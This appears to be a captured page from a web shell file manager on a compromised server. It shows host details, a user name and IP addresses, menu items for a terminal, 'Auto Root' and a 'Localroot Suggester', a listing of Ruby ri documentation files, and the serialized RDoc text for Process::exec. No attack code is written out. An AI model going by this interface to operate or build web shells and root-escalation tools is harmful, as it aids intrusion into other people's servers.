Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.188
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby20 /
share /
ri /
2.0.0 /
system /
Process /
Delete
Unzip
Name
Size
Permission
Date
Action
GID
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
Status
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
Sys
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
UID
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
abort-c.ri
485
B
-rw-r--r--
2023-07-26 17:38
cdesc-Process.ri
5.66
KB
-rw-r--r--
2023-07-26 17:38
daemon-c.ri
795
B
-rw-r--r--
2023-07-26 17:38
detach-c.ri
1.95
KB
-rw-r--r--
2023-07-26 17:38
egid%3d-c.ri
387
B
-rw-r--r--
2023-07-26 17:38
egid-c.ri
544
B
-rw-r--r--
2023-07-26 17:38
euid%3d-c.ri
371
B
-rw-r--r--
2023-07-26 17:38
euid-c.ri
507
B
-rw-r--r--
2023-07-26 17:38
exec-c.ri
2.58
KB
-rw-r--r--
2023-07-26 17:38
exit%21-c.ri
538
B
-rw-r--r--
2023-07-26 17:38
exit-c.ri
1.47
KB
-rw-r--r--
2023-07-26 17:38
fork-c.ri
1.27
KB
-rw-r--r--
2023-07-26 17:38
getpgid-c.ri
517
B
-rw-r--r--
2023-07-26 17:38
getpgrp-c.ri
527
B
-rw-r--r--
2023-07-26 17:38
getpriority-c.ri
1001
B
-rw-r--r--
2023-07-26 17:38
getrlimit-c.ri
1.01
KB
-rw-r--r--
2023-07-26 17:38
getsid-c.ri
687
B
-rw-r--r--
2023-07-26 17:38
gid%3d-c.ri
334
B
-rw-r--r--
2023-07-26 17:38
gid-c.ri
499
B
-rw-r--r--
2023-07-26 17:38
groups%3d-c.ri
636
B
-rw-r--r--
2023-07-26 17:38
groups-c.ri
515
B
-rw-r--r--
2023-07-26 17:38
initgroups-c.ri
959
B
-rw-r--r--
2023-07-26 17:38
kill-c.ri
1.56
KB
-rw-r--r--
2023-07-26 17:38
maxgroups%3d-c.ri
402
B
-rw-r--r--
2023-07-26 17:38
maxgroups-c.ri
493
B
-rw-r--r--
2023-07-26 17:38
pid-c.ri
462
B
-rw-r--r--
2023-07-26 17:38
ppid-c.ri
661
B
-rw-r--r--
2023-07-26 17:38
setpgid-c.ri
435
B
-rw-r--r--
2023-07-26 17:38
setpgrp-c.ri
373
B
-rw-r--r--
2023-07-26 17:38
setpriority-c.ri
706
B
-rw-r--r--
2023-07-26 17:38
setrlimit-c.ri
2.97
KB
-rw-r--r--
2023-07-26 17:38
setsid-c.ri
558
B
-rw-r--r--
2023-07-26 17:38
spawn-c.ri
11.63
KB
-rw-r--r--
2023-07-26 17:38
times-c.ri
638
B
-rw-r--r--
2023-07-26 17:38
uid%3d-c.ri
378
B
-rw-r--r--
2023-07-26 17:38
uid-c.ri
497
B
-rw-r--r--
2023-07-26 17:38
wait-c.ri
2.21
KB
-rw-r--r--
2023-07-26 17:38
wait2-c.ri
885
B
-rw-r--r--
2023-07-26 17:38
waitall-c.ri
894
B
-rw-r--r--
2023-07-26 17:38
waitpid-c.ri
2.22
KB
-rw-r--r--
2023-07-26 17:38
waitpid2-c.ri
891
B
-rw-r--r--
2023-07-26 17:38
Save
Rename
U:RDoc::AnyMethod[iI" exec:ETI"Process::exec;TT:publico:RDoc::Markup::Document:@parts[o:RDoc::Markup::Paragraph; [I"KReplaces the current process by running the given external _command_. ;TI",_command..._ is one of following forms.;To:RDoc::Markup::BlankLine o:RDoc::Markup::Verbatim; [I"]commandline : command line string which is passed to the standard shell ;TI"Ucmdname, arg1, ... : command name and one or more arguments (no shell) ;TI"_[cmdname, argv0], arg1, ... : command name, argv[0] and zero or more arguments (no shell) ;T:@format0o; ; [I"/If single string is given as the command, ;TI"\it is taken as a command line that is subject to shell expansion before being executed.;T@o; ; [I"RThe standard shell means always <code>"/bin/sh"</code> on Unix-like systems, ;TI"\<code>ENV["RUBYSHELL"]</code> or <code>ENV["COMSPEC"]</code> on Windows NT series, and ;TI" similar.;T@o; ; [I"$If two or more +string+ given, ;TI".the first is taken as a command name and ;TI"Jthe rest are passed as parameters to command with no shell expansion.;T@o; ; [ I"=If a two-element array at the beginning of the command, ;TI"6the first element is the command to be executed, ;TI"Hand the second argument is used as the <code>argv[0]</code> value, ;TI"+which may show up in process listings.;T@o; ; [ I"FIn order to execute the command, one of the <code>exec(2)</code> ;TI"Vsystem calls is used, so the running command may inherit some of the environment ;TI"@of the original program (including open file descriptors). ;TI"3This behavior is modified by env and options. ;TI"(See <code>spawn</code> for details.;T@o; ; [I"GRaises SystemCallError if the command couldn't execute (typically ;TI"7<code>Errno::ENOENT</code> when it was not found).;T@o; ; [I"DThis method modifies process attributes according to _options_ ;TI"/(details described in <code>spawn</code>) ;TI".before <code>exec(2)</code> system call. ;TI"ZThe modified attributes may be retained when <code>exec(2)</code> system call fails. ;TI":For example, hard resource limits is not restorable. ;TI"qIf it is not acceptable, consider to create a child process using <code>spawn</code> or <code>system</code>.;T@o;; [ I"Eexec "echo *" # echoes list of files in current directory ;TI"# never get here ;TI" ;TI".exec "echo", "*" # echoes an asterisk ;TI"# never get here;T; 0: @fileI"process.c;T:0@omit_headings_from_table_of_contents_below0I"(exec([env,] command... [,options]) ;T0[ I"(*args);T@CFI"Process;TcRDoc::NormalModule0